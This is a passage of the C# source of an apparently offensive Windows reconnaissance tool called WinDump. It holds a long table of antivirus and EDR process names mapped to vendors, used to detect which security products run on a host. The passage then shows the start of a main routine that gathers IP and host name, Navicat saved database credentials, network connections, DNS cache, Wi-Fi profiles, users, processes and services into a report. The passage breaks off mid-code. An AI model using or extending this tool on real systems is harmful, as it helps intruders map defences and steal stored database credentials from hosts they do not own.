93 | {"secenter.exe", "BitDefender"}, 94 | {"bdservicehost.exe", "BitDefender"}, 95 | {"BITDEFENDER.exe", "BitDefender"}, 96 | {"BKavService.exe", "Bkav"}, 97 | {"Bka.exe", "Bkav"}, 98 | {"BkavUtil.exe", "Bkav"}, 99 | {"BLuPro.exe", "Bkav"}, 100 | {"QUHLPSVC.exe", "CAT-QuickHeal"}, 101 | {"onlinent.exe", "CAT-QuickHeal"}, 102 | {"sapissvc.exe", "CAT-QuickHeal"}, 103 | {"scanwscs.exe", "CAT-QuickHeal"}, 104 | {"CMCTrayIcon.exe", "CMC"}, 105 | {"freshclam.exe", "ClamAV"}, 106 | {"cpf.exe", "Comodo"}, 107 | {"cavwp.exe", "Comodo"}, 108 | {"ccavsrv.exe", "Comodo"}, 109 | {"cmdvirth.exe", "Comodo"}, 110 | {"csfalconservice.exe", "CrowdStrike Falcon(猎鹰)"}, 111 | {"CSFalconContainer.exe", "CrowdStrike Falcon(猎鹰)"}, 112 | {"CybereasonRansomFree.exe", "Cybereason"}, 113 | {"CybereasonRansomFreeServiceHost.exe", "Cybereason"}, 114 | {"CybereasonAV.exe", "Cybereason"}, 115 | {"CylanceSvc.exe", "Cylance"}, 116 | {"vsedsps.exe", "Cyren"}, 117 | {"vseamps.exe", "Cyren"}, 118 | {"vseqrts.exe", "Cyren"}, 119 | {"drwebcom.exe", "DrWeb"}, 120 | {"spidernt.exe", "DrWeb"}, 121 | {"drwebscd.exe", "DrWeb"}, 122 | {"drweb32w.exe", "DrWeb"}, 123 | {"dwengine.exes", "DrWeb"}, 124 | {"egui.exe", "ESET-NOD32"}, 125 | {"ecls.exe", "ESET-NOD32"}, 126 | {"ekrn.exe", "ESET-NOD32"}, 127 | {"eguiProxy.exe", "ESET-NOD32"}, 128 | {"EShaSrv.exe", "ESET-NOD32"}, 129 | {"tmpfw.exe", "Trend Micro(趋势科技)"}, 130 | {"tmlisten.exe", "Trend Micro(趋势科技)"}, 131 | {"coreServiceShell.exe", "Trend Micro(趋势科技)"}, 132 | {"coreFrameworkHost.exe", "Trend Micro(趋势科技)"}, 133 | {"uiWatchDog.exe", "Trend Micro(趋势科技)"}, 134 | {"TMLISTEN.exe", "Trend Micro(趋势科技)"}, 135 | {"a2guard.exe", "Emsisoft"}, 136 | {"a2free.exe", "Emsisoft"}, 137 | {"a2service.exe", "Emsisoft"}, 138 | {"endgame.exe", "Endgame"}, 139 | {"F-PROT.exe", "F-Prot"}, 140 | {"FProtTray.exe", "F-Prot"}, 141 | {"FPAVServer.exe", "F-Prot"}, 142 | {"f-stopw.exe", "F-Prot"}, 143 | {"f-prot95.exe", "F-Prot"}, 144 | {"f-agnt95.exe", "F-Prot"}, 145 | {"f-secure.exe", "F-Secure"}, 146 | {"fssm32.exe", "F-Secure"}, 147 | {"Fsorsp64.exe", "F-Secure"}, 148 | {"fsavgui.exe", "F-Secure"}, 149 | {"fameh32.exe", "F-Secure"}, 150 | {"fch32.exe", "F-Secure"}, 151 | {"fih32.exe", "F-Secure"}, 152 | {"fnrb32.exe", "F-Secure"}, 153 | {"fsav32.exe", "F-Secure"}, 154 | {"fsma32.exe", "F-Secure"}, 155 | {"fsmb32.exe", "F-Secure"}, 156 | {"xagtnotif.exe", "FireEye(火眼)"}, 157 | {"xagt.exe", "FireEye(火眼)"}, 158 | {"FortiClient.exe", "Fortinet(飞塔)"}, 159 | {"FortiTray.exe", "Fortinet(飞塔)"}, 160 | {"FortiScand.exe", "Fortinet(飞塔)"}, 161 | {"FortiWF.exe", "Fortinet(飞塔)"}, 162 | {"FortiProxy.exe", "Fortinet(飞塔)"}, 163 | {"FortiESNAC.exe", "Fortinet(飞塔)"}, 164 | {"FortiSSLVPNdaemon.exe", "Fortinet(飞塔)"}, 165 | {"FortiTcs.exe", "Fortinet(飞塔)"}, 166 | {"FctSecSvr.exe", "Fortinet(飞塔)"}, 167 | {"AVK.exe", "G Data安全软件客户端 or GData"}, 168 | {"avkcl.exe", "GData"}, 169 | {"avkpop.exe", "GData"}, 170 | {"avkservice.exe", "GData"}, 171 | {"GDScan.exe", "G Data扫描器 or GData"}, 172 | {"AVKWCtl.exe", "GData"}, 173 | {"AVKProxy.exe", "G Data杀毒代理 or GData"}, 174 | {"AVKBackupService.exe", "G Data备份服务 or GData"}, 175 | {"guardxservice.exe", "Ikarus"}, 176 | {"guardxkickoff.exe", "Ikarus"}, 177 | {"KVFW.exe", "Jiangmin"}, 178 | {"KVsrvXP.exe", "Jiangmin"}, 179 | {"KVMonXP.exe", "Jiangmin"}, 180 | {"KVwsc.exe", "Jiangmin"}, 181 | {"K7TSecurity.exe", "K7AntiVirus"}, 182 | {"K7TSMain.Exe", "K7AntiVirus"}, 183 | {"K7TSUpdT.exe", "K7AntiVirus"}, 184 | {"avp.exe", "Kaspersky(卡巴斯基)"}, 185 | {"avpcc.exe", "Kaspersky(卡巴斯基)"}, 186 | {"avpm.exe", "Kaspersky(卡巴斯基)"}, 187 | {"kavpf.exe", "Kaspersky(卡巴斯基)"}, 188 | {"kavfs.exe", "Kaspersky(卡巴斯基)"}, 189 | {"klnagent.exe", "Kaspersky(卡巴斯基)"}, 190 | {"kavtray.exe", "Kaspersky(卡巴斯基)"}, 191 | {"kavfswp.exe", "Kaspersky(卡巴斯基)"}, 192 | {"kaspersky.exe", "Kaspersky(卡巴斯基)"}, 193 | {"SDSystemTray.exe", "Max Secure Software"}, 194 | {"MaxRCSystemTray.exe", "Max Secure Software"}, 195 | {"RCSystemTray.exe", "Max Secure Software"}, 196 | {"MaxAVPlusDM.exe", "Max Secure Software"}, 197 | {"LiveUpdateSD.exe", "Max Secure Software"}, 198 | {"MBAMService.exe", "Malwarebytes"}, 199 | {"mbam.exe", "Malwarebytes"}, 200 | {"mbamtray.exe", "Malwarebytes"}, 201 | {"Mcshield.exe", "McAfee(迈克菲)"}, 202 | {"Tbmon.exe", "McAfee(迈克菲)"}, 203 | {"Frameworkservice.exe", "McAfee(迈克菲)"}, 204 | {"firesvc.exe", "McAfee(迈克菲)"}, 205 | {"firetray.exe", "McAfee(迈克菲)"}, 206 | {"hipsvc.exe", "McAfee(迈克菲)"}, 207 | {"mfevtps.exe", "McAfee(迈克菲)"}, 208 | {"mcafeefire.exe", "McAfee(迈克菲)"}, 209 | {"shstat.exe", "McAfee(迈克菲)"}, 210 | {"vstskmgr.exe", "McAfee(迈克菲)"}, 211 | {"engineserver.exe", "McAfee(迈克菲)"}, 212 | {"alogserv.exe", "McAfee(迈克菲)"}, 213 | {"avconsol.exe", "McAfee(迈克菲)"}, 214 | {"cmgrdian.exe", "McAfee(迈克菲)"}, 215 | {"cpd.exe", "McAfee(迈克菲)"}, 216 | {"mcmnhdlr.exe", "McAfee(迈克菲)"}, 217 | {"mcvsshld.exe", "McAfee(迈克菲)"}, 218 | {"mcvsrte.exe", "McAfee(迈克菲)"}, 219 | {"mghtml.exe", "McAfee(迈克菲)"}, 220 | {"mpfservice.exe", "McAfee(迈克菲)"}, 221 | {"mpfagent.exe", "McAfee(迈克菲)"}, 222 | {"mpftray.exe", "McAfee(迈克菲)"}, 223 | {"vshwin32.exe", "McAfee(迈克菲)"}, 224 | {"vsstat.exe", "McAfee(迈克菲)"}, 225 | {"guarddog.exe", "McAfee(迈克菲)"}, 226 | {"mfeann.exe", "McAfee(迈克菲)"}, 227 | {"udaterui.exe", "McAfee(迈克菲)"}, 228 | {"naprdmgr.exe", "McAfee(迈克菲)"}, 229 | {"mctray.exe", "McAfee(迈克菲)"}, 230 | {"fcagate.exe", "McAfee(迈克菲)"}, 231 | {"fcag.exe", "McAfee(迈克菲)"}, 232 | {"fcags.exe", "McAfee(迈克菲)"}, 233 | {"fcagswd.exe", "McAfee(迈克菲)"}, 234 | {"macompatsvc.exe", "McAfee(迈克菲)"}, 235 | {"masvc.exe", "McAfee(迈克菲)"}, 236 | {"mcamnsvc.exe", "McAfee(迈克菲)"}, 237 | {"mctary.exe", "McAfee(迈克菲)"}, 238 | {"mfecanary.exe", "McAfee(迈克菲)"}, 239 | {"mfeconsole.exe", "McAfee(迈克菲)"}, 240 | {"mfeesp.exe", "McAfee(迈克菲)"}, 241 | {"mfefire.exe", "McAfee(迈克菲)"}, 242 | {"mfefw.exe", "McAfee(迈克菲)"}, 243 | {"mfemms.exe", "McAfee(迈克菲)"}, 244 | {"mfetp.exe", "McAfee(迈克菲)"}, 245 | {"mfewc.exe", "McAfee(迈克菲)"}, 246 | {"mfewch.exe", "McAfee(迈克菲)"}, 247 | {"MsMpEng.exe", "Microsoft Security Essentials"}, 248 | {"msseces.exe", "Microsoft Security Essentials"}, 249 | {"mssecess.exe", "Microsoft Security Essentials"}, 250 | {"emet_agent.exe", "Microsoft Security Essentials"}, 251 | {"emet_service.exe", "Microsoft Security Essentials"}, 252 | {"drwatson.exe", "Microsoft Security Essentials"}, 253 | {"MpCmdRun.exe", "Microsoft Security Essentials"}, 254 | {"NisSrv.exe", "Microsoft Security Essentials"}, 255 | {"MsSense.exe", "Microsoft Security Essentials"}, 256 | {"MSASCui.exe", "Microsoft Security Essentials"}, 257 | {"MSASCuiL.exe", "Microsoft Security Essentials"}, 258 | {"SecurityHealthService.exe", "Microsoft Security Essentials"}, 259 | {"nanoav.exe", "NANO-Antivirus"}, 260 | {"nanoav64.exe", "NANO-Antivirus"}, 261 | {"nanoreport.exe", "NANO-Antivirus"}, 262 | {"nanoreportc.exe", "NANO-Antivirus"}, 263 | {"nanoreportc64.exe", "NANO-Antivirus"}, 264 | {"nanorst.exe", "NANO-Antivirus"}, 265 | {"nanosvc.exe", "NANO-Antivirus"}, 266 | {"PanInstaller.exe", "Palo Alto Networks"}, 267 | {"remupd.exe", "Panda Security"}, 268 | {"apvxdwin.exe", "Panda Security"}, 269 | {"pavproxy.exe", "Panda Security"}, 270 | {"pavsched.exe", "Panda Security"}, 271 | {"360sd.exe", "Qihoo-360"}, 272 | {"360tray.exe", "Qihoo-360"}, 273 | {"ZhuDongFangYu.exe", "Qihoo-360"}, 274 | {"360rp.exe", "Qihoo-360"}, 275 | {"360rps.exe", "Qihoo-360"}, 276 | {"360safe.exe", "Qihoo-360"}, 277 | {"360safebox.exe", "360保险箱 or Qihoo-360"}, 278 | {"QHActiveDefense.exe", "360TotalSecurity(360国际版) or Qihoo-360"}, 279 | {"360skylarsvc.exe", "Qihoo-360"}, 280 | {"LiveUpdate360.exe", "Qihoo-360"}, 281 | {"RavMonD.exe", "Rising"}, 282 | {"rfwmain.exe", "Rising"}, 283 | {"RsMgrSvc.exe", "Rising"}, 284 | {"RavMon.exe", "Rising"}, 285 | {"superantispyware.exe", "SUPERAntiSpyware"}, 286 | {"sascore.exe", "SUPERAntiSpyware"}, 287 | {"SAdBlock.exe", "SUPERAntiSpyware"}, 288 | {"sabsvc.exe", "SUPERAntiSpyware"}, 289 | {"UniversalAVService.exe", "SecureAge APEX"}, 290 | {"EverythingServer.exe", "SecureAge APEX"}, 291 | {"clamd.exe", "SecureAge APEX"}, 292 | {"SavProgress.exe", "Sophos AV"}, 293 | {"icmon.exe", "Sophos AV"}, 294 | {"SavMain.exe", "Sophos AV"}, 295 | {"SophosUI.exe", "Sophos AV"}, 296 | {"SophosFS.exe", "Sophos AV"}, 297 | {"SophosHealth.exe", "Sophos AV"}, 298 | {"SophosSafestore64.exe", "Sophos AV"}, 299 | {"SophosCleanM.exe", "Sophos AV"}, 300 | {"SophosFileScanner.exe", "Sophos AV"}, 301 | {"SophosNtpService.exe", "Sophos AV"}, 302 | {"SophosOsquery.exe", "Sophos AV"}, 303 | {"Sophos UI.exe", "Sophos AV"}, 304 | {"QQPCRTP.exe", "Tencent"}, 305 | {"QQPCTray.exe", "Tencent"}, 306 | {"QQPCMgr.exe", "Tencent"}, 307 | {"QQPCNetFlow.exe", "Tencent"}, 308 | {"QQPCRealTimeSpeedup.exe", "Tencent"}, 309 | {"AMRT.exe", "TotalDefense"}, 310 | {"SWatcherSrv.exe", "TotalDefense"}, 311 | {"Prd.ManagementConsole.exe", "TotalDefense"}, 312 | {"TrapmineEnterpriseService.exe", "Trapmine"}, 313 | {"TrapmineEnterpriseConfig.exe", "Trapmine"}, 314 | {"TrapmineDeployer.exe", "Trapmine"}, 315 | {"TrapmineUpgradeService.exe", "Trapmine"}, 316 | {"TMBMSRV.exe", "TrendMicro"}, 317 | {"ntrtscan.exe", "TrendMicro"}, 318 | {"Pop3Trap.exe", "TrendMicro"}, 319 | {"WebTrap.exe", "TrendMicro"}, 320 | {"PccNTMon.exe", "亚信安全防毒墙网络版 or TrendMicro"}, 321 | {"SBAMSvc.exe", "VIPRE"}, 322 | {"VipreEdgeProtection.exe", "VIPRE"}, 323 | {"SBAMTray.exe", "VIPRE"}, 324 | {"vrmonnt.exe", "ViRobot"}, 325 | {"vrmonsvc.exe", "ViRobot"}, 326 | {"Vrproxyd.exe", "ViRobot"}, 327 | {"npwebroot.exe", "Webroot"}, 328 | {"WRSA.exe", "Webroot"}, 329 | {"spysweeperui.exe", "Webroot"}, 330 | {"Yandex.exe", "Yandex"}, 331 | {"YandexDisk.exe", "Yandex"}, 332 | {"yandesk.exe", "Yandex"}, 333 | {"zillya.exe", "Zillya"}, 334 | {"ZAVAux.exe", "Zillya"}, 335 | {"ZAVCore.exe", "Zillya"}, 336 | {"vsmon.exe", "ZoneAlarm"}, 337 | {"zapro.exe", "ZoneAlarm"}, 338 | {"zonealarm.exe", "ZoneAlarm"}, 339 | {"ZPSTray.exe", "Zoner"}, 340 | {"dasc.exe", "eGambit"}, 341 | {"memscan64.exe", "eGambit"}, 342 | {"dastray.exe", "eGambit"}, 343 | {"consctl.exe", "eScan"}, 344 | {"mwaser.exe", "eScan"}, 345 | {"avpmapp.exe", "eScan"}, 346 | {"AAWTray.exe", "Lavasoft"}, 347 | {"LavasoftTcpService.exe", "Lavasoft"}, 348 | {"AdAwareTray.exe", "Lavasoft"}, 349 | {"WebCompanion.exe", "Lavasoft"}, 350 | {"WebCompanionInstaller.exe", "Lavasoft"}, 351 | {"adawarebp.exe", "Lavasoft"}, 352 | {"ad-watch.exe", "Lavasoft"}, 353 | {"cleaner8.exe", "The Cleaner"}, 354 | {"vba32lder.exe", "VBA32"}, 355 | {"MongoosaGUI.exe", "Mongoosa"}, 356 | {"mongoose.exe", "Mongoosa"}, 357 | {"CorantiControlCenter32.exe", "Coranti2012"}, 358 | {"UnThreat.exe", "UnThreat"}, 359 | {"utsvc.exe", "UnThreat"}, 360 | {"CKSoftShiedAntivirus4.exe", "Shield Antivirus"}, 361 | {"shieldtray.exe", "Shield Antivirus"}, 362 | {"AVWatchService.exe", "VIRUSfighter"}, 363 | {"vfproTray.exe", "VIRUSfighter"}, 364 | {"iptray.exe", "Immunet"}, 365 | {"PSafeSysTray.exe", "PSafe"}, 366 | {"PSafeCategoryFinder.exe", "PSafe"}, 367 | {"psafesvc.exe", "PSafe"}, 368 | {"nspupsvc.exe", "nProtect"}, 369 | {"Npkcmsvc.exe", "nProtect"}, 370 | {"npnj5Agent.exe", "nProtect"}, 371 | {"SpywareTerminatorShield.exe", "Spyware Terminator"}, 372 | {"SpywareTerminator.exe", "Spyware Terminator"}, 373 | {"ccSvcHst.exe", "Norton(赛门铁克)"}, 374 | {"rtvscan.exe", "Norton(赛门铁克)"}, 375 | {"ccapp.exe", "Symantec(赛门铁克) or Norton(赛门铁克)"}, 376 | {"NPFMntor.exe", "Norton(赛门铁克)"}, 377 | {"ccRegVfy.exe", "Norton(赛门铁克)"}, 378 | {"vptray.exe", "Symantec(赛门铁克) or Norton(赛门铁克)"}, 379 | {"iamapp.exe", "Norton(赛门铁克)"}, 380 | {"nav.exe", "Norton(赛门铁克)"}, 381 | {"navapw32.exe", "Norton(赛门铁克)"}, 382 | {"navapsvc.exe", "Norton(赛门铁克)"}, 383 | {"nisum.exe", "Norton(赛门铁克)"}, 384 | {"nmain.exe", "Norton(赛门铁克)"}, 385 | {"nprotect.exe", "Norton(赛门铁克)"}, 386 | {"smcGui.exe", "Symantec(赛门铁克) or Norton(赛门铁克)"}, 387 | {"ns.exe", "Norton(赛门铁克)"}, 388 | {"nortonsecurity.exe", "Norton(赛门铁克)"}, 389 | {"afwServ.exe", "Norton V25(Avast)"}, 390 | {"aswEngSrv.exe", "Norton V25(Avast)"}, 391 | {"aswidsagent.exe", "Norton V25(Avast)"}, 392 | {"AvDump.exe", "Norton V25(Avast)"}, 393 | {"nllToolsSvc.exe", "Norton V25(Avast)"}, 394 | {"NortonSvc.exe", "Norton V25(Avast)"}, 395 | {"wsc_proxy.exe", "Norton V25(Avast)"}, 396 | {"ccSetMgr.exe", "Symantec(赛门铁克)"}, 397 | {"ccpxysvc.exe", "Symantec(赛门铁克)"}, 398 | {"cfgwiz.exe", "Symantec(赛门铁克)"}, 399 | {"smc.exe", "Symantec(赛门铁克)"}, 400 | {"symproxysvc.exe", "Symantec(赛门铁克)"}, 401 | {"vpc32.exe", "Symantec(赛门铁克)"}, 402 | {"lsetup.exe", "Symantec(赛门铁克)"}, 403 | {"luall.exe", "Symantec(赛门铁克)"}, 404 | {"lucomserver.exe", "Symantec(赛门铁克)"}, 405 | {"sbserv.exe", "Symantec(赛门铁克)"}, 406 | {"ccEvtMgr.exe", "Symantec(赛门铁克)"}, 407 | {"snac.exe", "Symantec(赛门铁克)"}, 408 | {"SymCorpUI.exe", "Symantec(赛门铁克)"}, 409 | {"sepWscSvc64.exe", "Symantec(赛门铁克)"}, 410 | {"knsdtray.exe", "可牛杀毒"}, 411 | {"Miner.exe", "流量矿石"}, 412 | {"safedog.exe", "SafeDog(安全狗)"}, 413 | {"SafeDogGuardCenter.exe", "SafeDog(安全狗)"}, 414 | {"SafeDogSiteIIS.exe", "SafeDog(安全狗)"}, 415 | {"SafeDogTray.exe", "SafeDog(安全狗)"}, 416 | {"SafeDogServerUI.exe", "SafeDog(安全狗)"}, 417 | {"SafeDogSiteApache.exe", "SafeDog(安全狗)"}, 418 | {"CloudHelper.exe", "SafeDog(安全狗)"}, 419 | {"SafeDogUpdateCenter.exe", "SafeDog(安全狗)"}, 420 | {"parmor.exe", "木马克星"}, 421 | {"Iparmor.exe", "木马克星"}, 422 | {"beikesan.exe", "贝壳云安全"}, 423 | {"TrojanHunter.exe", "木马猎手"}, 424 | {"GG.exe", "巨盾网游安全盾"}, 425 | {"adam.exe", "绿鹰安全精灵"}, 426 | {"AST.exe", "超级巡警"}, 427 | {"ananwidget.exe", "墨者安全专家"}, 428 | {"FYFireWall.exe", "风云防火墙"}, 429 | {"MPMon.exe", "微点主动防御"}, 430 | {"pfw.exe", "天网防火墙"}, 431 | {"D_Safe_Manage.exe", "D 盾"}, 432 | {"d_manage.exe", "D 盾"}, 433 | {"yunsuo_agent_service.exe", "云锁"}, 434 | {"yunsuo_agent_daemon.exe", "云锁"}, 435 | {"HwsPanel.exe", "护卫神"}, 436 | {"hws_ui.exe", "护卫神"}, 437 | {"hws.exe", "护卫神"}, 438 | {"hwsd.exe", "护卫神"}, 439 | {"HwsHostPanel.exe", "护卫神"}, 440 | {"HwsHostMaster.exe", "护卫神"}, 441 | {"hipstray.exe", "火绒安全"}, 442 | {"wsctrl.exe", "火绒安全"}, 443 | {"usysdiag.exe", "火绒安全"}, 444 | {"HipsDaemon.exe", "火绒安全"}, 445 | {"HipsLog.exe", "火绒安全"}, 446 | {"HipsMain.exe", "火绒安全"}, 447 | {"wsctrlsvc.exe", "火绒安全"}, 448 | {"WEBSCANX.exe", "网络病毒克星"}, 449 | {"SPHINX.exe", "SPHINX防火墙"}, 450 | {"TQClient.exe", "奇安信天擎"}, 451 | {"TQTray.exe", "奇安信天擎"}, 452 | {"QaxEngManager.exe", "奇安信天擎"}, 453 | {"TQDefender.exe", "奇安信天擎"}, 454 | {"avwin.exe", "H+BEDV Datentechnik GmbH"}, 455 | {"avwupsrv.exe", "H+BEDV Datentechnik GmbH"}, 456 | {"blackd.exe", "IBM ISS Proventia"}, 457 | {"rapapp.exe", "IBM ISS Proventia"}, 458 | {"eeyeevnt.exe", "eEye Digital Security"}, 459 | {"blink.exe", "eEye Digital Security"}, 460 | {"cv.exe", "TamoSoft"}, 461 | {"ent.exe", "TamoSoft"}, 462 | {"persfw.exe", "Kerio Personal Firewall"}, 463 | {"wrctrl.exe", "Kerio Personal Firewall"}, 464 | {"Trjscan.exe", "Simplysup"}, 465 | {"PCTAV.exe", "PC Tools AntiVirus"}, 466 | {"pctsGui.exe", "PC Tools AntiVirus"}, 467 | {"vbcmserv.exe", "VirusBuster Professional"}, 468 | {"ClamTray.exe", "ClamWin"}, 469 | {"clamscan.exe", "ClamWin"}, 470 | {"kxetray.exe", "金山毒霸 or 安天智甲"}, 471 | {"kscan.exe", "金山毒霸 or 安天智甲"}, 472 | {"AMediumManager.exe", "安天智甲"}, 473 | {"kismain.exe", "安天智甲"}, 474 | {"CMCNECore.exe", "CMC Endpoint Security"}, 475 | {"cmcepagent.exe", "CMC Endpoint Security"}, 476 | {"cmccore.exe", "CMC Endpoint Security"}, 477 | {"CMCLog.exe", "CMC Endpoint Security"}, 478 | {"CMCFMon.exe", "CMC Endpoint Security"}, 479 | {"kxescore.exe", "金山毒霸"}, 480 | {"kupdata.exe", "金山毒霸"}, 481 | {"kwsprotect64.exe", "金山毒霸"}, 482 | {"kislive.exe", "金山毒霸"}, 483 | {"knewvip.exe", "金山毒霸"}, 484 | {"kxecenter.exe", "金山毒霸"}, 485 | {"kxemain.exe", "金山毒霸"}, 486 | {"KWatch.exe", "金山毒霸"}, 487 | {"KSafeSvc.exe", "金山毒霸"}, 488 | {"KSafeTray.exe", "金山毒霸"}, 489 | {"outpost.exe", "Agnitum outpost (Outpost Firewall)"}, 490 | {"acs.exe", "Agnitum outpost (Outpost Firewall)"}, 491 | {"CynetLauncher.exe", "Cynet"}, 492 | {"CynetDS.exe", "Cynet"}, 493 | {"CynetEPS.exe", "Cynet"}, 494 | {"CynetMS.exe", "Cynet"}, 495 | {"CynetAR.exe", "Cynet"}, 496 | {"CynetGW.exe", "Cynet"}, 497 | {"CynetSD64.exe", "Cynet"}, 498 | {"winlogbeat.exe", "Elastic"}, 499 | {"KSWebShield.exe", "金山网盾"}, 500 | {"kpfwtray.exe", "金山网镖"}, 501 | {"1433.exe", "在扫1433"}, 502 | {"DUB.exe", "在爆破"}, 503 | {"ServUDaemon.exe", "发现S-U"}, 504 | {"baiduSafeTray.exe", "百度卫士"}, 505 | {"avkwctl9.exe", "G Data文件系统实时监控"}, 506 | {"AVKWCTL.exe", "G Data文件系统实时监控"}, 507 | {"SAVMAIN.exe", "Sophos Anti-Virus"}, 508 | {"safeboxTray.exe", "360保险箱"}, 509 | {"Notifier.exe", "亚信安全服务器深度安全防护系统"}, 510 | {"AliYunDun.exe", "阿里云盾"}, 511 | {"AliYunDunUpdate.exe", "阿里云盾"}, 512 | {"aliyun_assist_service.exe", "阿里云盾"}, 513 | {"BaradAgent.exe", "腾讯云安全"}, 514 | {"sgagent.exe", "腾讯云安全"}, 515 | {"YDService.exe", "腾讯云安全"}, 516 | {"YDLive.exe", "腾讯云安全"}, 517 | {"YDEdr.exe", "腾讯云安全"}, 518 | {"360WebSafe.exe", "360主机卫士Web"}, 519 | {"QHSrv.exe", "360主机卫士Web"}, 520 | {"QHWebshellGuard.exe", "360主机卫士Web"}, 521 | {"gov_defence_service.exe", "网防G01"}, 522 | {"gov_defence_daemon.exe", "网防G01"}, 523 | {"PC.exe", "云锁客户端"}, 524 | {"SNDSrvc.exe", "Symantec Shared诺顿邮件防火墙软件"}, 525 | {"USBKiller.exe", "U盘杀毒专家"}, 526 | {"360EntClient.exe", "天擎EDRAgent"}, 527 | {"360EntMisc.exe", "360(奇安信)天擎"}, 528 | {"alisecguard.exe", "阿里云-云盾"}, 529 | {"ALsvc.exe", "Sophos AutoUpdate Service"}, 530 | {"CmsGoAgent.windows-amd64.", "阿里云监控"}, 531 | {"edr_agent.exe", "深信服EDRAgent"}, 532 | {"edr_monitor.exe", "深信服EDRAgent"}, 533 | {"edr_sec_plan.exe", "深信服EDRAgent"}, 534 | {"rm_service.exe", "戎码翼龙 NG-EDR"}, 535 | {"rm_live.exe", "戎码翼龙 NG-EDR"}, 536 | {"rm_tray.exe", "戎码翼龙 NG-EDR"}, 537 | {"rm_hips.exe", "戎码翼龙 NG-EDR"}, 538 | {"ESAV.exe", "启明星辰天珣EDRAgent"}, 539 | {"ESCCControl.exe", "启明星辰天珣EDRAgent"}, 540 | {"ESCC.exe", "启明星辰天珣EDRAgent"}, 541 | {"ESCCIndex.exe", "启明星辰天珣EDRAgent"}, 542 | {"gse_win_agent.exe", "蓝鲸Agent"}, 543 | {"gse_win_daemon.exe", "蓝鲸Agent"}, 544 | {"LAVService.exe", "联想电脑管家"}, 545 | {"McsAgent.exe", "Sophos MCS Agent"}, 546 | {"McsClient.exe", "Sophos MCS Client"}, 547 | {"QHSafeMain.exe", "360TotalSecurity(360国际版)"}, 548 | {"QHSafeTray.exe", "360TotalSecurity(360国际版)"}, 549 | {"QHWatchdog.exe", "360TotalSecurity(360国际版)"}, 550 | {"sdcservice.exe", "Sophos Device Control Service"}, 551 | {"SEDService.exe", "Sophos Endpoint Defense Service"}, 552 | {"smartscreen.exe", "Windows Defender SmartScreen"}, 553 | {"SophosCleanM64.exe", "Sophos Clean Service"}, 554 | {"SophosFIMService.exe", "Sophos FIM"}, 555 | {"SSPService.exe", "Sophos System Protection Service"}, 556 | {"swc_service.exe", "Sophos Web Control Service"}, 557 | {"TitanAgent.exe", "天眼云镜"}, 558 | {"TitanMonitor.exe", "天眼云镜"}, 559 | {"TopsecMain.exe", "天融信终端防御"}, 560 | {"TopsecTray.exe", "天融信终端防御"}, 561 | {"wdswfsafe.exe", "360杀毒-网盾"}, 562 | {"WiseVector.exe", "智量安全"}, 563 | {"WiseVectorSvc.exe", "智量安全"}, 564 | {"QAXEntClient.exe", "天擎"}, 565 | {"QAXTray.exe", "天擎"}, 566 | {"AgentService.exe", "安恒主机卫士"}, 567 | {"ProtectMain.exe", "安恒主机卫士"}, 568 | {"Deep Security Manager.exe", "亚信DS服务端"}, 569 | {"dsa.exe", "亚信DS客户端"}, 570 | {"UniAccessAgent.exe", "亚信DS客户端"}, 571 | {"dsvp.exe", "亚信DS客户端"}, 572 | {"zabbix_agentd", "zabbix agen端"}, 573 | {"AliHips", "阿里系监控"}, 574 | {"AliNet", "阿里系监控"}, 575 | {"AliDetect", "阿里系监控"}, 576 | {"AliScriptEngine", "阿里系监控"}, 577 | {"secu-tcs-agent", "腾讯系监控"}, 578 | {"SentinelServiceHost.exe", "SentinelOne(哨兵一号)"}, 579 | {"SentinelStaticEngine.exe", "SentinelOne(哨兵一号)"}, 580 | {"SentinelStaticEngineScanner.exe", "SentinelOne(哨兵一号)"}, 581 | {"SentinelMemoryScanner.exe", "SentinelOne(哨兵一号)"}, 582 | {"SentinelAgent.exe", "SentinelOne(哨兵一号)"}, 583 | {"SentinelAgentWorker.exe", "SentinelOne(哨兵一号)"}, 584 | {"SentinelUI.exe", "SentinelOne(哨兵一号)"}, 585 | {"tbAgent.exe", "OneSec(微步)"}, 586 | {"tbAgentSrv.exe", "OneSec(微步)"}, 587 | {"tbGuard.exe", "OneSec(微步)"}, 588 | {"PccNT.exe", "亚信安全防毒墙网络版"}, 589 | {"PccNTUpd.exe", "亚信安全防毒墙网络版"}, 590 | {"venVtapServer.exe", "Illumio ZTS"}, 591 | {"venPlatformHandler.exe", "Illumio ZTS"}, 592 | {"venAgentMonitor.exe", "Illumio ZTS"}, 593 | {"venAgentMgr.exe", "Illumio ZTS"}, 594 | {"NuboshEndpoint.exe", "奇安信统一服务器安全"}, 595 | {"IMF.exe", "IObit Malware Fighter"}, 596 | {"IMFCore.exe", "IObit Malware Fighter"}, 597 | {"IMFsrv.exe", "IObit Malware Fighter"}, 598 | {"IMFSrvWsc.exe", "IObit Malware Fighter"}, 599 | }; 600 | } 601 | } 602 | -------------------------------------------------------------------------------- /Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.IO; 5 | using System.IO.Compression; 6 | using System.Net; 7 | using System.Text; 8 | 9 | namespace WinDump 10 | { 11 | internal class Program 12 | { 13 | static void Main(string[] args) 14 | { 15 | try 16 | { 17 | DoMain(); 18 | } 19 | catch (Exception ex) 20 | { 21 | File.WriteAllText(Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "error.log"), ex.ToString()); 22 | Environment.Exit(1); 23 | } 24 | } 25 | static void DoMain() 26 | { 27 | var title = "windump"; 28 | DataTable navicatkey = null; 29 | DataTable navicat = null; 30 | try 31 | { 32 | title = Interface.GetIP() + "_" + Environment.MachineName; 33 | navicat = Navicat.GetNavicat(out navicatkey); 34 | } 35 | catch { } 36 | Dictionary values = new Dictionary 37 | { 38 | {"{title}", title}, 39 | // Network 40 | {"{interface}", Utils.TryToHTML(Interface.GetInterface)}, 41 | {"{route}", Utils.TryToHTML(Routing.GetRoute)}, 42 | {"{tcp}", Utils.TryToHTML(Netstat.GetTCP)}, 43 | {"{udp}", Utils.TryToHTML(Netstat.GetUDP)}, 44 | {"{dns}", Utils.TryToHTML(DNSCache.GetDNSCache)}, 45 | {"{wifi}", Utils.TryToHTML(WIFI.GetWIFI)}, 46 | 47 | // User 48 | {"{user}", Utils.TryToHTML(User.GetUser)}, 49 | {"{quser}", Utils.TryToHTML(QUser.GetQUser)}, 50 | 51 | // Process 52 | {"{process}", Utils.TryToHTML(Process.GetProcess)}, 53 | {"{service}", Utils.TryToHTML(Process.GetService)}, 54 | {"{av}", Utils.TryToHTML(Process.GetAV)}, 55 | 56 | // Files 57 | {"{hosts}", 